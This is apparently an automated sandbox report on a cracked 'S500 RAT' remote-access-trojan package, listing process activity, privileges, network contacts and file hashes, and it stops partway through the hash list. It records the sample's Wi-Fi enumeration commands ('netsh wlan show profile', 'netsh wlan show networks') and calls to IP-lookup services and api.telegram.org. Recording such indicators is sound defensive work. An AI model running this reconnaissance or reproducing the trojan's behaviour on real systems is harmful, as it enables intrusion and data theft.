Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2252 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2580 wrote to memory of 2380 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\system32\cmd.exe
PID 2380 wrote to memory of 2596 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2380 wrote to memory of 2028 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 1360 wrote to memory of 2292 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 2292 wrote to memory of 1048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2292 wrote to memory of 2784 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2292 wrote to memory of 900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1360 wrote to memory of 1644 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 1644 wrote to memory of 1204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 1644 wrote to memory of 3056 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.185.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 104.21.44.66:443 api.mylnikov.org tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\cgeoip.dll

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\protobuf-net.dll

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\vestris.resourcelib.dll

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\Form4.resx

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\FormDOS.resx

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.props

C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\S500RAT.csproj.nuget.g.targets

MD5 3d9ef7c4c2db6e7631832825418a9ba6
SHA1 b2ac00b06d61c8498914ea52eaedaab01fae1a21
SHA256 6d1bba3214839a263b1c34c8668d7dc5ff2d0ee91cd4a1b01d251b7595ee94d7
SHA512 641939c4c1b7e61c90aa8ffaf9e3ac701c669a0d58ee85706f291197bacd2717451deb0fe95b4b9bb0daa56965fcdfcfe065decfcab657ac380b132887023035

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 27ca366a1d5c573827ffe735774b3948
SHA1 3c5b461746dfe30be57c9645f0f306df22934a29
SHA256 2b0cd717c200ba50563d065367955ecf4999dc708fcf80dd9862bb7a48672fab
SHA512 23ad694861f1a74afd8dd07bbc02f92b0a5fa5ba6b27eccd48d57ff415170f2187583dded882ec2ed9d390cab527ac5c8adedb9ae0d62021272626bbce6c92ee

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 87ca06f69c513f4fbbf67c5b4e366210
SHA1 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA256 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

memory/1880-1252-0x00000000013D0000-0x00000000014F8000-memory.dmp

memory/1880-1253-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1880-1255-0x00000000004F0000-0x0000000000570000-memory.dmp

memory/1880-1256-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 aa2fc72b58059e5e7e9e7003ab466322
SHA1 e171576589134431baccb40d308e7dcbc776e087
SHA256 f107c0f275bd1c773e1ff2d78b60a4060b8353b02f45d3892968206fedffdf88
SHA512 26d69ad0d3f41bf08585307595e1d670c7d7905e1f86a566a36d9b0c836d3b349a6349e1f2885d433d35bd111f95ce004ae34e81443f96b73e784db3594e3eef

memory/2192-1259-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2192-1260-0x00000000012B0000-0x0000000002374000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll

MD5 0f07705bd42d86d77dab085c42775244
SHA1 7e4b5c367183f4753a8d610e353c458c3def3888
SHA256 cf9b66e11506fa431849350c0cb58430a71e5ec943d2db9ef1b2e2302f299443
SHA512 851b1a4c470ee7fe07ce5619c16fd391428585926c5b559694a9e445633ea51ec86c74a3bbf3bce39d943c4bf714dad2fd3c4a4d0703be2333541c79a2ee97f0

memory/2192-1261-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1263-0x000000001C5C0000-0x000000001C7B2000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

MD5 604f8eb4afe0d9a9e3fb5f7981c09145
SHA1 92d44f43b4c9fc84b99ba34c5abb3672725ecc69
SHA256 682e2204557a05cddbaddef019cbc2eda6eaa50007f20851eadb9a33c35c458d
SHA512 cf35e1559004f48ed1ffbf5b78ae19861afb8e19a9979a49294da60f0f83ef7428bd3b5d09b869c6ce556141938d0d387deb350b10c0c9ca58087d384e4d3598

\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll

MD5 9c43f77cb7cff27cb47ed67babe3eda5
SHA1 b0400cf68249369d21de86bd26bb84ccffd47c43
SHA256 f25b9288fe370dcfcb4823fb4e44ab88c7f5fce6e137d0dba389a3dba07d621e
SHA512 cde6fb6cf8db6f9746e69e6c10214e60b3646700d70b49668a2a792e309714dd2d4c5a5241977a833a95fcde8318abcc89eb9968a5039a0b75726bbfa27125a7

memory/1360-1274-0x0000000000150000-0x0000000000182000-memory.dmp

memory/2192-1273-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp

memory/2192-1272-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/1360-1275-0x0000000074680000-0x0000000074D6E000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll

MD5 af527b22b92a23c38a492c5961cf2643
SHA1 15106adfa13415287b3e9d8deba21df53cb92eda
SHA256 4208c9293c5684d2fc3c8f5a269a1120adee32fbd2766bbb73410aab2d491b7a
SHA512 543cce9b5e4c9558bf0bd0da9d6af8c1ad2f7d62e2d65a9aa4e3af9e4840ce6fb6bbe8952bd20f6f1e3a6d3b5e5e5b3417a60b6d955bfa4e23a653262677b49c

memory/2192-1277-0x000000001D010000-0x000000001D250000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

MD5 5b52658c4517684971de10a6b7a67c30
SHA1 f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256 3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512 ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6

memory/2580-1279-0x0000000000400000-0x0000000000439000-memory.dmp

memory/1360-1281-0x0000000002020000-0x0000000002060000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat

MD5 fc4af7384f0b6f274dd3e745f0aceeaa
SHA1 31b310f869b15b84e52ef282cabaee974e5043cf
SHA256 f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34
SHA512 dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

MD5 8d1e09604f03d722a6203a50d13c476a
SHA1 b5c43ff15b9a01346907e2c96936c1b855719b0e
SHA256 283504cf75629ea4958b2b3e34d1f4e072090d907ce2b829e0fafd4b7598d357
SHA512 6d0eec952abed603a769830d8cef19fff751a207b411a905824585f219aa6f541ff1c84dfd423f7405ee4efdb92ac75e0e78667cb43e245cc48ad9185cb4f26e

memory/2192-1283-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1285-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2028-1286-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1289-0x000007FEF28D0000-0x000007FEF29FC000-memory.dmp

memory/2028-1292-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1293-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2028-1291-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1294-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1290-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2192-1295-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2028-1296-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1297-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1298-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1299-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/1360-1300-0x0000000074680000-0x0000000074D6E000-memory.dmp

memory/2028-1301-0x0000000000C60000-0x0000000000C92000-memory.dmp

memory/2192-1302-0x0000000001280000-0x00000000012B2000-memory.dmp

memory/2028-1303-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2580-1304-0x0000000000400000-0x0000000000439000-memory.dmp

memory/2192-1305-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/1360-1306-0x0000000002020000-0x0000000002060000-memory.dmp

memory/2192-1307-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1308-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1309-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1310-0x000007FEF5940000-0x000007FEF632C000-memory.dmp

memory/2192-1311-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1312-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2028-1313-0x000007FEF69A0000-0x000007FEF69C7000-memory.dmp

memory/2028-1314-0x000000001C350000-0x000000001C3D0000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll

MD5 3aaae3cec15b86693ae9fb8e1507c872
SHA1 ed8d0a139c609eb886482718ec2ecf96cbbe8c84
SHA256 a027b6b344e5a637bc8377fe58166273d2b76e92ff8c66bd505d46c21fe3b21b
SHA512 407558e01ade1832bb021b5af0209e7a6bef98ab35b9f4723a1add48362bd13f566697a8fb41af48c0bb15ca13585f9c09ac8d5da0feb322798c778b09cf4463

memory/2192-1316-0x000000001BD70000-0x000000001BD7C000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12

MD5 c60e527a85f285ddc66c2fcf160b1be7
SHA1 abcf2b6bffea9f0f30190783f6eae2434ef7a9a8
SHA256 35c46a9e9dc60a74a25572e743794a31fecd08672813d349a39f2d13b01e789f
SHA512 77a661544c2d7f2d8b870cdd503b806aea6de3a2b5aee19327c05aeef137a1df3661d249219fe73e7a300189c732efeb5d2004226c6e429fa024f1d3b1dec84e

memory/2192-1319-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2028-1321-0x000000001C350000-0x000000001C3D0000-memory.dmp

memory/2192-1324-0x0000000031C80000-0x0000000031CBC000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll

MD5 17cbdd9e4cb0ede2fad8c08c05fdaa84
SHA1 74bc0ea3e8bd64c6752b6c0adac1bfe2b313416c
SHA256 d975bc4711655e6fd2361ae9b056c617051f616ced5b46ce7772255a85712441
SHA512 1948c20585ecb9984cd9452a74bcb75e81c35ca37f0cf0e1d3f211ad71b9e40c215f4784af7803cec9baef9984f682a32817a85806aefad21830b13b6a0a6a4a

memory/2192-1322-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1326-0x000000001BD90000-0x000000001BE10000-memory.dmp

memory/2192-1325-0x000000001BD90000-0x000000001BE10000-memory.dmp

C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt

MD5 d5b77dfb5f248f3aabc560d8300088c5
SHA1 bbf7bb5f78051a59e725920cea3d54d1e7473cea
SHA256 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55
SHA512 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552

C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt

MD5 531208ea558a68c95339bea9517845c3
SHA1 95865bbeb196cf007626c92cdef1524c9b16dc5a
SHA256 dbceb36fa695bfe2bd706b22cb690976a3df77a46ec97d9188a3875308044b3a
SHA512 46f04b05cd14d80bef69325802464d190856af9f2844312f84263baf00eb14d3ca58d647fed8fcc5de0106883ec3f2546fed8b58ca09464fd6a336e7dece66f3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm

MD5 feb8d2de1663adc1e141b8f7bb95d6ac
SHA1 a9b1c4d0f522515c940a80876876d782510cb421
SHA256 ac2add960f9b626020137271676a37d6185b05c55000d2f0858f7e788e0ab37b
SHA512 af139097158c44b5feb297655dcc925fffe95acf9f2cf2248e46e3538b94a2e5f84caa01f4c1a6d0166d9fa258a2052c49e673b6ee9566ba7625f4733c6487a3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm

MD5 e6fad395145548f21929c4050a70d710
SHA1 97a8780b8a3d25185f83f88c5f320384b4069601
SHA256 c0a37c88fd96703c0e1f8779143bb22471d7eaea8ec05d2892feed5cd15dcf92
SHA512 857035df11651a57af93af57fc2e4728afe99016479a508fdbb7bc1f6ea1c9305e32939533aed86bdabd2a1b190b9e8b0c1d1c62b0194902e068e35d40167799

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm

MD5 1efa2056cd994a29fd0d2e983ef7b26e
SHA1 76967624574c43b1e22e9b3ec4ba17139b547633
SHA256 1e832c97029620e75e6f8a053d3ec90750e7f5857803ebce82526bfa9ec39e9d
SHA512 edccae7798df98b6ed9ed3ec7fbc09acd7aeafd700704383b7e065ae2c155afc50854b21b0fd2fa20de2c0efbc674079fe9463744789b109e23ae840fa7c4ac2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm

MD5 78f905ea7378410c450c79ceb3b9012b
SHA1 495f677fd305c78a77e8164f7de7d732e1aca35c
SHA256 50156675295081d268576f77201b4f78bb466446e18ca4af410833f16de7646a
SHA512 ae549f79413222a81e9b2082f3ea287ee8a34626a43bfb43c29bfb2504324620740dae465263fa280ada6450895fe856512b38b94455b058022a143e2a6583f5

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm

MD5 be38b0526e6d40f44c7b62d8db2c9553
SHA1 5c4c70ae1381b5e51a685f96700340832229c06d
SHA256 f1eaa5bd68ac32d37066ba1cb83d1349526df1558d7cf0767950760f442f788f
SHA512 77ba15f77a94afe24ef725a54dbefbc83894981b34fac4002e2b50bc22336d40fb371ded8db2bab3b68e76e182f552121fd443ff34211b3f96fce393e7c113ac

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm

MD5 e03eaf459f028cc6fa8669e277c1a17a
SHA1 ea0a775e49e279208962a9179c974969a2cf7e5e
SHA256 a32a88946334b5f32fe890fcb104b090dd38cb32ef7948f5b8382bcc2d8da61f
SHA512 17efa3673568cc44f9ef8b925bd133e1bf69851cfcbac2888db5a3a7b522c15be0d6155b4311c704355be086cfd809547628d3cb963449e4bd277fc2682d895d

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm

MD5 a54153cd522d951f6b360c3bd3de84d0
SHA1 639dbc414f495044c2d705f39ac965212f1c8c30
SHA256 195e94c80f787fa5e24168c46fe392d2710e9c6e4b25b31ed73201c3d2bc93fa
SHA512 95e49e83a69e5480cc2eda09e9124236a5a10af2c99795825b001005d0dd0806cf203e93cdf7459101c082b198d9c1c6078d6bbf8075d33818b87f7e7e1ae5e3

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt

MD5 f7bbcdd86cbc1d6d0b81720ac1477fde
SHA1 4799c37f86be4dda105ed3468934f70c36339474
SHA256 50f8cecbfc4491bb320692efbc0003b045760683bb63913fd42152dafc0c922f
SHA512 2a49ee7b7fe7b6e319455f9f9dde0906187dac60076ad83e161ef68a91319827183af0f1ae48b6e6e656419a9cb5029a29591e15083da8f113660724863445c2

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt

MD5 963be96779d4ef26360c2a3af3a53816
SHA1 6991959998c9939e5ededa0d6759a715559c2140
SHA256 f639582a95112fc90e21e63757e8814f957cb597fbc18d15603e433bf551aaf4
SHA512 4525ce17036d54504143b39eb5a1a7ee1b6abe4f42ebca82c78d66d387f68f427595e73705f19ed0b61cc12c4cd473b84b3e7d87290deb8bf8a86eb904b520b0

C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt

MD5 e9f329a48dcb70c6ad95c8ab8fe82eb0
SHA1 45e25355e67fd2d528467b4117884ffb601552a3
SHA256 5dd46720271713bdef9edafe9058dbee1a10003dea7cac4cb5cdb53d68a3a637
SHA512 62648e1f40ff46f54921adfd928b7cae29a9bd9778e0334b80ca593e9afbcdc287c1e7df5afa08cb44fa97cfcdd164216c4adb9566af146ac00da6fbb3e8cad4

C:\Users\Admin\Desktop\S500 RAT Source Code\readme.txt

MD5 5983ea5e477d9bbd7751a1903e017762
SHA1 e472313990708995c479b50e8ff10c9e1140086d
SHA256 ac9c17fb596e6ee68245d12ac63b9393c9c511fb3afe71448d5e5749cacca1ae
SHA512 5220c7d82a2c1e146ba22c00eb778e97fc19c34efb01a1412b4c7b52731dffb33cb0d5d11a2424d0152a6b61b50521a7dd6c320aa6792c791b88b9ba9a6c16a1

C:\Users\Admin\Desktop\S500 RAT Source Code\Program.cs

MD5 d6b005305acfbe4587508dc3877294a9
SHA1 38d568415346ff78acf79f0d518e7a8e9f6be959
SHA256 adfd734db6c4735f58bdbd5a5c4903f6a88de7b921c8d3c5a2da7e03bce29f3a
SHA512 e7b52e740c572c8dcd9f4a94340dbdf85eed8bc85fd913345aa6835996b574dc7e5b489a4dbcc2fdc74db4a4a782836cac19943a9999747969a9ef9f252db330

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\App.cs

MD5 53a1bc7f4a72237331ecb9aa01da8bd0
SHA1 5b6c10f01e7379ff063df6fc9dfd64ce48155527
SHA256 3b41c5acf029271942597465183c1cafbd1652775d4abb4ee249eb7e4823d3fa
SHA512 5ba23177fc0e4e239dee02ed4974dc22c3def9e4168bee0a0e3361e19a44529ead5ea4b9c82c1e0a321e5c3b959ec371d035b59e82c28fb2f2820ea966a12d01

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\ApplicationSettings.cs

MD5 bf517b0b3a45c9a9451e3656b20a9f52
SHA1 51faa109422107d1573941da825203b3f92c362c
SHA256 5fb10237128d258baa75e30b8b9b48a29c369ab663f238b8539233da74816c5d
SHA512 45bdea0cb0eca0c6d225df6f04afcbd9938907d0c608d27bdfab41697b03c67c078d86a4185297d95fdc9f0b5bfaf60e9b0d6c4e580c48ea33d10b8094979456

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Constants.cs

MD5 27a443d8293a5dbdcd20d66a5276f3d5
SHA1 d25303340a9a7641d8b1a94ac3e1754d28c0493d
SHA256 540d854b4e00858cd71a3744661b5040e81b9b230bd0ddc8ab4e8ddef96061d8
SHA512 a8ca338d9dd62a42f6d6055085cd5761e648f9cb579cda1268c88258800c87f7c05e5a936959c6b6ad8d5f6513b867fb50f3177de9eafc242f0ca06a94a23ed0

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\Encryption.cs

MD5 62c65acccd046b1e89a14a281c6838cb
SHA1 f678a5a11db9de94e2bc3851dcdb5f2f66e79fb5
SHA256 027631c1264c3aba3249e584d60f754527642b8df7fe0ffd41624e2a9631d7f6
SHA512 b5ca7cd5a5540201cbebc7bcf3c047bf2252f8c592df6475eb27dd6272a8566ede02dee299894a91466c56311b8432cc936a05a77bba3730dfbd905848932341

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\InfoManager.cs

MD5 7788eff3b5d130358db1a9d5b5d94a86
SHA1 156ec3c54a43031250f7281509870acad29c3e4f
SHA256 f918c37ff46c7fa8139d6e1a721e10fda36ee80074388b356ec9f0aae090678f
SHA512 602211b0e1431a53b897188d045bbc9753238b47f8bdc52c0311391c3311cd7ad84b72be0ca6cd2086e3452f47b3cf832574bd048f3459ff6c7b929d2223aba2

C:\Users\Admin\Desktop\S500 RAT Source Code\Auth\User.cs

MD5 590245612bc4e68a666b907a436d7e55
SHA1 9c6e20ad5b6c43ebccb86db9251db4a68a2d766e
SHA256 9b0feb06f9af76fb63fd3231c5b00cb2fc6575bc64f82f9a3d477b43092a7a09
SHA512 f902edd07ca5b22e6626e9c670ac49436a4d938e4123b9762ed1ab35dea0f563e54dd79328c93cf61dbc554f85adde0a8bafbae14da71ee6432caefa6a3dabf0

C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\BuildInfo.cs

MD5 a47f0eb84d4a844f6701449df7b49a5b
SHA1 26324a1ca64a5d20752018e95251cb3d071ade86
SHA256 dbc8c5d2d4a19ffda08dfa1ebec268ccd78b378ddf7a09d5f7d668d2010ec3be
SHA512 77dce702ee16c5d43901262ddea35c741c549c211471ac784e499a16839da68d59f74398b35ab1e28c6a8e888b0efc2a141f3c87e3659338709b7501ccc82c80

C:\Users\Admin\Desktop\S500 RAT Source Code\Binfo\Utils.cs

MD5 b2e8e581082f57271651e8d9fe19a40b
SHA1 6d8af5b3b558f2d829b0da5ace4d4c67876cd290
SHA256 331995f462b4d970a7c4f0556e53c7600973f40c8bcea6d8a72c5b40fc4f1598
SHA512 b550b382ec244cf4f52e8b4b156148aea06f6784ae9bfd7923ea7992a2e15604588efbfd732074c439da7d54d5b1a6838ae5aa0b4a17f432efc7fa523850d082

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FormAbout.cs

MD5 a17915e3f1f17ba1ceba3d59ffe503f1
SHA1 5a0654c3c64613406a36dc0ac86889ca9e8422c3
SHA256 d4da167b054ca0bc40f2c060d3bbe5d4b43f90d1d41b722f1ea14273f7332f46
SHA512 2b654e65214da976254b9400bfeda93365cb0681185b14b101dbb1e2f0ea87e20bc1790ef9c861128f2f3e6bbbe6036b330cb25eb17834c74cafa30204b16fa4

C:\Users\Admin\Desktop\S500 RAT Source Code\Forms\FrmRec.cs

MD5 1d772d1ef6b3ba72be0d41fb569e25ac
SHA1 196c0531b1122ed575af3d1deaa9498a9f01ed1f
SHA256 1fa6f6a85eccb1b84a1206cade3e9c1fbd152d3feb167abb009dd0df741e320a
SHA512 dae5e1524d70592b1b025d964d4df918ab6a47650d0cfb4ccf21e3cf84982945e889077be613b67ed33a58985f56b410b3b94bbdd9dc5021b15455a0761789b5

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleChat.cs

MD5 fad096cd4f2dbb2e05c2994b5812cb13
SHA1 aa016fe79d20771b735af6e816b8675d9f319819
SHA256 6ad8b6df50461c9587fcc97472b91cfaa28dba53fb0aaf15cda7140161ef3c9a
SHA512 9d4a4635de312d676ed4705bc17f76a91503339fa75908632fe8a31717c4f21007c25291f6b254c1e9a9eb85c8be70ec34932d115eb611f04c74fbf5354d8bb8

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleFileSearcher.cs

MD5 483622c17b2f1c7bcac04a8574aae2fe
SHA1 6896f388bb201d161c485fb20732d4f84c663d7e
SHA256 f3f27c05bd7829d6883423ce7cba0e9719fb2ff0b661b5f64059eafb73611214
SHA512 bfc48dae2b88cd18051048c893c90a56626b317b834c8829bbcdbdc09d4ecea970102022d1c860b1bc447203f4a9798616157e290f8d1f0f97b8a0759a9a991d

C:\Users\Admin\Desktop\S500 RAT Source Code\Handlers\HandleDos.cs

MD5 85b26983126bc8f4255f154f1b43026d
SHA1 289705d88a9d80b31614df3c6a1ed63a8e6e093f
